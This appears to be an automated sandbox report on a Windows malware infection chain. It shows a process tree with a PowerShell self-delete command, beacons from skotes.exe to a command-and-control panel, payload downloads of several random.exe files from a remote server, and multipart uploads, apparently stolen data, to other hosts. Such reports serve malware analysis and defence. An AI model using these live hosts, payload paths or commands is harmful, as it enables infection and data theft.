- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2348
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4644
- - C:\Windows\system32\PING.EXE
    "C:\Windows\system32\PING.EXE" 127.1.10.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3888

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

232.168.11.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.168.11.51.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

64.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

64.159.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Dec 2024 16:44:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Dec 2024 16:44:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Dec 2024 16:44:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Dec 2024 16:44:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Dec 2024 16:44:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Dec 2024 16:44:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Dec 2024 16:45:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

43.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.113.215.185.in-addr.arpa

IN PTR

Response
GET

http://31.41.244.11/files/burpin1/random.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/burpin1/random.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Dec 2024 16:44:29 GMT
Content-Type: application/octet-stream
Content-Length: 4438776
Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT
Connection: keep-alive
ETag: "675784f0-43baf8"
Accept-Ranges: bytes
GET

http://31.41.244.11/files/unique3/random.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/unique3/random.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Dec 2024 16:44:35 GMT
Content-Type: application/octet-stream
Content-Length: 1988608
Last-Modified: Tue, 17 Dec 2024 16:10:49 GMT
Connection: keep-alive
ETag: "6761a289-1e5800"
Accept-Ranges: bytes
GET

http://31.41.244.11/files/fate/random.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/fate/random.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Dec 2024 16:44:40 GMT
Content-Type: application/octet-stream
Content-Length: 776832
Last-Modified: Tue, 17 Dec 2024 09:45:14 GMT
Connection: keep-alive
ETag: "6761482a-bda80"
Accept-Ranges: bytes
GET

http://31.41.244.11/files/martin/random.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/martin/random.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Dec 2024 16:44:43 GMT
Content-Type: application/octet-stream
Content-Length: 4444160
Last-Modified: Tue, 17 Dec 2024 15:51:30 GMT
Connection: keep-alive
ETag: "67619e02-43d000"
Accept-Ranges: bytes
GET

http://31.41.244.11/files/unique1/random.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/unique1/random.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Dec 2024 16:44:53 GMT
Content-Type: application/octet-stream
Content-Length: 4455424
Last-Modified: Tue, 17 Dec 2024 15:28:31 GMT
Connection: keep-alive
ETag: "6761989f-43fc00"
Accept-Ranges: bytes
DNS

11.244.41.31.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.244.41.31.in-addr.arpa

IN PTR

Response
DNS

13.86.106.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.86.106.20.in-addr.arpa

IN PTR

Response
DNS

pancakedipyps.click

43cf0fb499.exe

Remote address:

8.8.8.8:53

Request

pancakedipyps.click

IN A

Response

pancakedipyps.click

IN A

104.21.23.76

pancakedipyps.click

IN A

172.67.209.202
POST

https://pancakedipyps.click/api

43cf0fb499.exe

Remote address:

104.21.23.76:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: pancakedipyps.click

Response

HTTP/1.1 200 OK

Date: Tue, 17 Dec 2024 16:44:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=7a7vgufrrgn5mrjkrhp0ai9q7d; expires=Sat, 12-Apr-2025 10:31:22 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FDYBeDklHsWNB8WAFElvdDzZJetWei69B4bjUMltFrT61ATFAwNBullB07hiCu6RumBTXWpu2UMUC%2FiroUzflKbC643LVGf4VVV9l0OJ%2BgEDndFuNpUeLJYXwuWvBvA89C8mgBci"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3861218eb1fb8b-AMS
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=36520&min_rtt=34093&rtt_var=11818&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3304&recv_bytes=611&delivery_rate=108222&cwnd=249&unsent_bytes=0&cid=d815c8512a11c049&ts=238&x=0"
POST

https://pancakedipyps.click/api

43cf0fb499.exe

Remote address:

104.21.23.76:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 46
Host: pancakedipyps.click

Response

HTTP/1.1 200 OK

Date: Tue, 17 Dec 2024 16:44:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=fins4f2nd8ctfv33uejrm0p0be; expires=Sat, 12-Apr-2025 10:31:22 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6UtfRciro7LgXlRHOOx34t%2FM4GT28RgseWxvKj%2FZrGY2EWWDL7HuWIvoAy9nh2%2FIEf%2FachuYgEgg0H4y09SBuptkQjDnqbjxfKcePkzS6EULWH5OKdWSuYKOWnxm5%2FS%2FGFlDa06x"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f386122a9a3fb8b-AMS
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=36072&min_rtt=32915&rtt_var=9758&sent=9&recv=10&lost=0&retrans=0&sent_bytes=4416&recv_bytes=982&delivery_rate=108222&cwnd=251&unsent_bytes=0&cid=d815c8512a11c049&ts=502&x=0"
POST

https://pancakedipyps.click/api

43cf0fb499.exe

Remote address:

104.21.23.76:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=GSDBQA1591Y2CI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 13274
Host: pancakedipyps.click

Response

HTTP/1.1 200 OK

Date: Tue, 17 Dec 2024 16:44:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=uaa7u9cgg3sb70id4a105ufgl2; expires=Sat, 12-Apr-2025 10:31:22 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9JT%2BwWR5h%2Fm%2FmpVpSjO%2FL0YhcTkaJ4SuxQHNy32uxovJrdXFiB894La%2F2qNXP%2BZj8zIc4Cf3%2BVQ62fjH2FO%2FWXOd22H%2FLZmAjlG%2B0EztxSm%2Fex1odCuxwJFiRt%2FsWlzlm9HSS6si"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f386124ef4bfb8b-AMS
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=33532&min_rtt=32472&rtt_var=1531&sent=37&recv=33&lost=0&retrans=0&sent_bytes=24732&recv_bytes=14595&delivery_rate=941244&cwnd=253&unsent_bytes=0&cid=d815c8512a11c049&ts=977&x=0"
DNS

76.23.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

76.23.21.104.in-addr.arpa

IN PTR

Response
POST

https://pancakedipyps.click/api

43cf0fb499.exe

Remote address:

104.21.23.76:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=7LA64ME93W3QXVPQ0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 9731
Host: pancakedipyps.click

Response

HTTP/1.1 200 OK

Date: Tue, 17 Dec 2024 16:44:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=t9g4r54qhjgmm77gqg8rln8bkd; expires=Sat, 12-Apr-2025 10:31:23 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bcGF0IJ26e86PzTmOfQBEYv55eJbQTDXVkYAMGaoiGWaZkcBgPXTJpciWDgWMu3fR94Z%2FW8kZ5KotdJNB%2Fk9O24RkCFj1MdMntPyRHkTqZna3VSne4e8qVXlZSpRk3ogOB%2Bn9oP3"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f386127ee5448c7-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=26515&min_rtt=26151&rtt_var=6106&sent=6&recv=14&lost=0&retrans=0&sent_bytes=3306&recv_bytes=10351&delivery_rate=147409&cwnd=252&unsent_bytes=0&cid=aacf5ee25e3007e6&ts=407&x=0"
POST

https://pancakedipyps.click/api

43cf0fb499.exe

Remote address:

104.21.23.76:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=QPK5MJJ5L38CPWQ8I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18156
Host: pancakedipyps.click

Response

HTTP/1.1 200 OK

Date: Tue, 17 Dec 2024 16:44:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=7ohmu9vb4op4eh0fcfglghs6dk; expires=Sat, 12-Apr-2025 10:31:23 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jF%2FUyQgGZhCCqtDIAZux52vQpte80wr%2FCd1smJd4dIER6V3Mo1zTdRHZNjqs3R4DhJnK2bscBNXDRtb2qff5Zpr4AOaXc%2Bp820L9V0MRdS6sdSM%2BJ9J1GxLjs2eoG1fn%2FI2fsOVB"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f38612b083fedf8-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=27341&min_rtt=26250&rtt_var=6100&sent=13&recv=20&lost=0&retrans=0&sent_bytes=3305&recv_bytes=18806&delivery_rate=149465&cwnd=253&unsent_bytes=0&cid=570a001d3abdf794&ts=287&x=0"
POST

https://pancakedipyps.click/api

43cf0fb499.exe

Remote address:

104.21.23.76:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=6GB7YW2MQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 169190
Host: pancakedipyps.click

Response

HTTP/1.1 200 OK

Date: Tue, 17 Dec 2024 16:44:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=28n5edmhmj6ci2g095ho0fe679; expires=Sat, 12-Apr-2025 10:31:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3F5Jh%2FfkRgTS%2BGCEE7NPkbutj%2BZQfaScE7HPOm%2B1JSrUj6QS2tdrC0GMAa7JXpzXUzfxdzsE9zIkdIsIqRRgLPacFab1KbbH1WZAM4BtniAVam9frc53dAumNJkt2RNtyhhhZR9B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f38612d5e84cd99-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=27831&min_rtt=26814&rtt_var=7139&sent=60&recv=131&lost=0&retrans=0&sent_bytes=3304&recv_bytes=170123&delivery_rate=146333&cwnd=253&unsent_bytes=0&cid=e88a4fb166b87695&ts=464&x=0"
POST

https://pancakedipyps.click/api

43cf0fb499.exe

Remote address:

104.21.23.76:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=3O4I1IPOJLUTTB5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1314
Host: pancakedipyps.click

Response

HTTP/1.1 200 OK

Date: Tue, 17 Dec 2024 16:44:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=lsduc5c7eoqmt25paq9abhr2j5; expires=Sat, 12-Apr-2025 10:31:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vWrxbC83fhxnB6wqNKmMy32WTOgCznKGt18EOvTByjNc7j%2F3fPnO%2FMqC2O9QipqGRgk1N3jnn30aXlnn4dMjnIsS%2B6TLxtQ6EcEMQsPANAg4u7KMIg2nkDhYUtxhYQJHeV0l7xy2"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f386130dc8db119-MAN
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=32312&min_rtt=32066&rtt_var=7162&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3305&recv_bytes=1932&delivery_rate=121656&cwnd=253&unsent_bytes=0&cid=a47db4ba76583207&ts=257&x=0"
POST

https://pancakedipyps.click/api

43cf0fb499.exe

Remote address:

104.21.23.76:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=2PG03H1BPZ469LWMUQS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 392778
Host: pancakedipyps.click

Response

HTTP/1.1 200 OK

Date: Tue, 17 Dec 2024 16:44:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=cgiias4sib6ubnumbq8i6snlj5; expires=Sat, 12-Apr-2025 10:31:25 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oBvMTFqfCNmtBrqYyWJxboLUhVsnPT40BKkXD5nkrDGiA8PYlhevTkd5j0CnrGO5vTE9fHthOoVMczh6%2BYRlXzviVU3gWcO5hVUvycTxm6dwnhZwLXSoSjltF7czmLJPMMdBLrCT"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3861341b1d417f-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=27259&min_rtt=26495&rtt_var=6066&sent=126&recv=297&lost=0&retrans=0&sent_bytes=3304&recv_bytes=394127&delivery_rate=145736&cwnd=253&unsent_bytes=0&cid=9b65430d451d04a3&ts=1863&x=0"
POST

https://pancakedipyps.click/api

43cf0fb499.exe

Remote address:

104.21.23.76:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 81
Host: pancakedipyps.click

Response

HTTP/1.1 200 OK

Date: Tue, 17 Dec 2024 16:44:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=h1g8ifa64c86toragh1k7f34su; expires=Sat, 12-Apr-2025 10:31:27 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eUttzYgyjSWlZZbi99BGuNgfXUSB3LOQCCTVsNIxSxURPkfcltmKsNZ11c6s0bKRJGUr0TeF70%2BbYbV4sriGcLiBuKZkyjy8b6gTkai3rysQ%2BeEqTooEq%2B4cFqIU4KfKImVzPG8c"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3861402f1acdb1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=28777&min_rtt=26734&rtt_var=7110&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3306&recv_bytes=685&delivery_rate=146386&cwnd=253&unsent_bytes=0&cid=a4763519b0e2e0a5&ts=215&x=0"
DNS

httpbin.org

e9af4c7f3b.exe

Remote address:

8.8.8.8:53

Request

httpbin.org

IN A

Response
DNS

httpbin.org

e9af4c7f3b.exe

Remote address:

8.8.8.8:53

Request

httpbin.org

IN AAAA

Response

httpbin.org

IN A

98.85.100.80

httpbin.org

IN A

34.226.108.155
DNS

home.fivetk5pn.top

e9af4c7f3b.exe

Remote address:

8.8.8.8:53

Request

home.fivetk5pn.top

IN A

Response

home.fivetk5pn.top

IN A

104.154.220.71
DNS

home.fivetk5pn.top

e9af4c7f3b.exe

Remote address:

8.8.8.8:53

Request

home.fivetk5pn.top

IN AAAA

Response
DNS

80.100.85.98.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.100.85.98.in-addr.arpa

IN PTR

Response

80.100.85.98.in-addr.arpa

IN PTR

ec2-98-85-100-80 compute-1 amazonawscom
POST

http://home.fivetk5pn.top/vJNDHPUXPCEIZZjTPbLp1734325090

e9af4c7f3b.exe

Remote address:

104.154.220.71:80

Request

POST /vJNDHPUXPCEIZZjTPbLp1734325090 HTTP/1.1
Host: home.fivetk5pn.top
Accept: */*
Content-Type: application/json
Content-Length: 486012

Response

HTTP/1.1 200 OK

server: nginx/1.22.1
date: Tue, 17 Dec 2024 16:45:02 GMT
content-type: text/html; charset=utf-8
content-length: 1
DNS

71.220.154.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

71.220.154.104.in-addr.arpa

IN PTR

Response

71.220.154.104.in-addr.arpa

IN PTR

71220154104bcgoogleusercontentcom
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

241.42.69.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.42.69.40.in-addr.arpa

IN PTR

Response
DNS

217.135.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.135.221.88.in-addr.arpa

IN PTR

Response

217.135.221.88.in-addr.arpa

IN PTR

a88-221-135-217deploystaticakamaitechnologiescom
DNS

home.fivetk5pn.top

e9af4c7f3b.exe

Remote address:

8.8.8.8:53

Request

home.fivetk5pn.top

IN A

Response

home.fivetk5pn.top

IN A

104.154.220.71
DNS

home.fivetk5pn.top

e9af4c7f3b.exe

Remote address:

8.8.8.8:53

Request

home.fivetk5pn.top

IN AAAA

Response
GET

http://home.fivetk5pn.top/vJNDHPUXPCEIZZjTPbLp1734325090?argument=0

e9af4c7f3b.exe

Remote address:

104.154.220.71:80

Request

GET /vJNDHPUXPCEIZZjTPbLp1734325090?argument=0 HTTP/1.1
Host: home.fivetk5pn.top
Accept: */*

Response

HTTP/1.1 404 NOT FOUND

server: nginx/1.22.1
date: Tue, 17 Dec 2024 16:45:03 GMT
content-type: text/html; charset=utf-8
content-length: 207
DNS

home.fivetk5pn.top

e9af4c7f3b.exe

Remote address:

8.8.8.8:53

Request

home.fivetk5pn.top

IN A

Response
DNS

home.fivetk5pn.top

e9af4c7f3b.exe

Remote address:

8.8.8.8:53

Request

home.fivetk5pn.top

IN AAAA

Response

home.fivetk5pn.top

IN A

104.154.220.71
POST

http://home.fivetk5pn.top/vJNDHPUXPCEIZZjTPbLp1734325090

e9af4c7f3b.exe

Remote address:

104.154.220.71:80

Request

POST /vJNDHPUXPCEIZZjTPbLp1734325090 HTTP/1.1
Host: home.fivetk5pn.top
Accept: */*
Content-Type: application/json
Content-Length: 31

Response

HTTP/1.1 404 NOT FOUND

server: nginx/1.22.1
date: Tue, 17 Dec 2024 16:45:03 GMT
content-type: text/html; charset=utf-8
content-length: 207
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

22.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.236.111.52.in-addr.arpa

IN PTR

Response

185.215.113.43:80

http://185.215.113.43/Zu7JuNko/index.php

http

skotes.exe

2.2kB
2.5kB
18
14

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200
31.41.244.11:80

http://31.41.244.11/files/unique1/random.exe

http

skotes.exe

552.7kB
16.8MB
11882
17355

HTTP Request

GET http://31.41.244.11/files/burpin1/random.exe

HTTP Response

200

HTTP Request

GET http://31.41.244.11/files/unique3/random.exe

HTTP Response

200

HTTP Request

GET http://31.41.244.11/files/fate/random.exe

HTTP Response

200

HTTP Request

GET http://31.41.244.11/files/martin/random.exe

HTTP Response

200

HTTP Request

GET http://31.41.244.11/files/unique1/random.exe

HTTP Response

200
104.21.23.76:443

https://pancakedipyps.click/api

tls, http

43cf0fb499.exe

16.1kB
27.5kB
35
40

HTTP Request

POST https://pancakedipyps.click/api

HTTP Response

200

HTTP Request

POST https://pancakedipyps.click/api

HTTP Response

200

HTTP Request

POST https://pancakedipyps.click/api

HTTP Response

200
104.21.23.76:443

https://pancakedipyps.click/api

tls, http

43cf0fb499.exe

11.1kB
4.8kB
17
10

HTTP Request

POST https://pancakedipyps.click/api

HTTP Response

200
104.21.23.76:443

https://pancakedipyps.click/api

tls, http

43cf0fb499.exe

19.7kB
5.1kB
22
16

HTTP Request

POST https://pancakedipyps.click/api

HTTP Response

200
104.21.23.76:443

https://pancakedipyps.click/api

tls, http

43cf0fb499.exe

175.5kB
7.0kB
134
64

HTTP Request

POST https://pancakedipyps.click/api

HTTP Response

200
104.21.23.76:443

https://pancakedipyps.click/api

tls, http

43cf0fb499.exe

2.4kB
4.8kB
10
10

HTTP Request

POST https://pancakedipyps.click/api

HTTP Response

200
104.21.23.76:443

https://pancakedipyps.click/api

tls, http

43cf0fb499.exe

